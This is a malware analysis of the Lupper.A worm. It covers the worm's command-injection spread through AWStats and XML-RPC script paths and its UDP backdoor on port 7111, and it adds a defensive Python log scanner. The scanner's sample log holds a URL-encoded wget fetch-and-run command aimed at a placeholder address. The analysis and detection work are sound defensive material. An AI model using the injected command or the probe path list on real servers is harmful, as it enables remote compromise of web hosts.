Method of Distribution
Via Exploits
Lupper attempts to execute a simple set of four commands on a remote server:
- Change folder to /tmp
- Download a copy of the worm named “lupii” from a particular hard-coded IP address using Wget
- Modify its execution attributes
- Execute the downloaded copy of the worm
The worm sends the above commands by exploiting the following vulnerabilities:
Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats script at the following locations:
- /cgi-bin/awstats.pl
- /awstats/awstats.pl
- /cgi-bin/awstats/awstats.pl
- /cgi/awstats/awstats.pl
- /scripts/awstats.pl
- /cgi-bin/stats/awstats.pl
- /stats/awstats.pl
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
- /xmlrpc.php
- /xmlrpc/xmlrpc.php
- /xmlsrv/xmlrpc.php
- /blog/xmlrpc.php
- /drupal/xmlrpc.php
- /community/xmlrpc.php
- /blogs/xmlrpc.php
- /blogs/xmlsrv/xmlrpc.php
- /blog/xmlsrv/xmlrpc.php
- /blogtest/xmlsrv/xmlrpc.php
- /b2/xmlsrv/xmlrpc.php
- /b2evo/xmlsrv/xmlrpc.php
- /wordpress/xmlrpc.php
- /phpgroupware/xmlrpc.php
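The two path lists above are what a defender can hunt for in web server access logs. The following is an added example (not from the original analysis) that flags requests to any of the probed awstats.pl or xmlrpc.php locations and raises the severity when the URL-encoded query carries fragments of the four-command sequence (cd /tmp, wget lupii, chmod, execute). The sample log, the query parameter name "p" and the 192.0.2.9 download address are constructed placeholders and do not reflect the worm's actual request format.

```python
import re
from urllib.parse import unquote
# Script locations the worm probes, copied from the two lists in the analysis above.
AWSTATS_PATHS = {
    "/cgi-bin/awstats.pl", "/awstats/awstats.pl", "/cgi-bin/awstats/awstats.pl",
    "/cgi/awstats/awstats.pl", "/scripts/awstats.pl", "/cgi-bin/stats/awstats.pl",
    "/stats/awstats.pl",
}
XMLRPC_PATHS = {
    "/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/xmlsrv/xmlrpc.php", "/blog/xmlrpc.php",
    "/drupal/xmlrpc.php", "/community/xmlrpc.php", "/blogs/xmlrpc.php",
    "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php", "/blogtest/xmlsrv/xmlrpc.php",
    "/b2/xmlsrv/xmlrpc.php", "/b2evo/xmlsrv/xmlrpc.php", "/wordpress/xmlrpc.php",
    "/phpgroupware/xmlrpc.php",
}
# Fragments of the worm's four-step command sequence (cd /tmp, wget lupii, chmod, run).
COMMAND_TOKENS = ("/tmp", "wget", "chmod", "lupii")
# Combined-format access log line: client, then "METHOD URI PROTOCOL" in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def classify(line):
    """Return (client, family, severity, tokens) for a request to a probed path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, uri = m.groups()
    path, _, query = uri.partition("?")
    if path in AWSTATS_PATHS:
        family = "awstats"
    elif path in XMLRPC_PATHS:
        family = "xmlrpc"
    else:
        return None
    decoded = unquote(query).lower()  # injected commands arrive URL-encoded
    tokens = [t for t in COMMAND_TOKENS if t in decoded]
    # POST bodies (where an XML-RPC payload travels) are absent from access logs,
    # so a bare request to a probed path is still reported, at lower severity.
    severity = "high" if tokens else "low"
    return client, family, severity, tokens

def scan(log_text):
    """Classify every line of an access log and keep only the hits."""
    return [r for r in (classify(ln) for ln in log_text.splitlines()) if r]

# Constructed sample log ("p" is a placeholder parameter; 203.0.113.x / 192.0.2.x are documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [07/Nov/2005:10:01:02 +0000] "GET /cgi-bin/awstats.pl?p=cd%20/tmp;wget%20http://192.0.2.9/lupii;chmod%20%2Bx%20lupii;./lupii HTTP/1.0" 200 512
203.0.113.5 - - [07/Nov/2005:10:01:03 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 200 88
198.51.100.7 - - [07/Nov/2005:10:02:00 +0000] "GET /index.html HTTP/1.0" 200 1024
"""
```

Running `scan(SAMPLE_LOG)` reports the awstats.pl request as high severity with all four tokens and the xmlrpc.php POST as a low-severity probe, while the ordinary page request is ignored.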
Payload
Backdoor Functionality
Lupper.A opens a UDP backdoor on port 7111 that allows a remote controller unauthorized access to the affected machine.
The worm can also relay Internet traffic, i.e. act as a proxy.
For additional information:
The worm reports back to its hosting site, sending data through UDP port 7111.
Analysis by Jakub Kaminski